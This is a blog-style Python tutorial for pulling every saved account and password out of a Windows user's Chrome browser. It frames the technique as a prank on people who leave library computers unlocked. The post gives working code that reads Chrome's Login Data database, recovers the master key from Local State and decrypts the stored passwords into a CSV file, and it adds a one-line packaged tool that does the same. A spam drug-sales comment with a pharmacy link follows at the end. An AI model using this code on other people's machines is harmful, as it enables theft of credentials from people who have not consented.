Python implements one-click access to the account password of the computer browser
I found that many people like to use computers to occupy seats in the school library (from the past to the present, I seem to have not been to the school library for many years), and often do not lock the screen when going out. In order to let everyone develop a good habit, I Let's take you to write a small program, you can quickly get all the accounts and passwords you stored in the computer browser without entering any password.
Without further ado, let's start happily~
Related documents
Github address
development tools
Python version: 3.7.8
Related modules:
pikachupytools module;
pycryptodome module;
And some modules that come with python.
Environment construction
Install Python and add it to the environment variable, and pip install the required related modules.
Introduction
As we all know, our browsers generally store the account numbers and passwords of many websites we have visited:
Under normal circumstances, viewing these passwords requires entering the computer's power-on password. But in fact, we can also directly view these account passwords in other ways. For example, the default path of the database file for saving account passwords in Google Chrome is:
os.environ['USERPROFILE'] + os.sep + r'AppData\Local\Google\Chrome\User Data\Default\Login Data'
We can get the corresponding account password by reading this file:
'''Read database data''' def readdb(self, dbpath, master_key): sql = 'SELECT origin_url, username_value, password_value, date_created, date_last_used FROM logins;' client = sqlite3.connect(dbpath) cursor = client.cursor () with open(self.savename, 'a', newline='', encoding='utf-8-sig') as csv_file: cursor.execute(sql) csv_writer = csv.writer(csv_file, dialect=('excel ')) if not self.write_heads_flag: csv_writer.writerow(self.csv_heads) self.write_heads_flag = True info = [] for row in cursor.fetchall(): for idx in range(len(self.csv_heads)): if isinstance(row[idx], bytes): info.append(self.decrypt(row[idx], master_key)) else: info.append(row[idx]) csv_writer.writerow(info) info = [] cursor.close() client.close()
The password is the encrypted result, and the printout looks like this:
But the decryption is actually very simple. We can know from the information on the Internet. We only need to obtain the key value:
'''Get master key''' def getmasterkey(self, local_state_path): import win32crypt with open(os.environ['USERPROFILE'] + os.sep + local_state_path, 'r', encoding='utf-8') as fp: local_state = fp.read() local_state = json.loads(local_state) master_key = base64.b64decode(local_state['os_crypt']['encrypted_key']) master_key = master_key[5:] master_key = win32crypt.CryptUnprotectData(master_key, None, None, None, 0)[1] return master_key
Then decode it according to the key value:
'''Decode''' def decrypt(self, value, master_key): print(value) if value[:3] == b'v10': from Crypto.Cipher import AES iv, payload = value[3:15] , value[15:] cipher = AES.new(master_key, AES.MODE_GCM, iv) decrypted_value = cipher.decrypt(payload) decrypted_value = decrypted_value[:-16].decode() else: import win32crypt decrypted_value = win32crypt.CryptUnprotectData( value)[1].decode() return decrypted_value
The results of the operation after decoding are as follows:
The obtained results are saved in results.csv by default. The screenshots are as follows:
ok, you're done, see the relevant documents for the complete source code.
Friends who want to test quickly just need to pip install the pikachupytools package:
pip install pikachupytools --upgrade
Then simply write a few lines of code to call and run:
from pytools import pytools tool_client = pytools.pytools() tool_client.execute('decryptbrowser')
buy lipitor 20mg online & lt;a href="https://lipiws.top/"& gt;order lipitor 10mg generic& lt;/a& gt; order lipitor 10mg
Lzxsvr
2024-03-08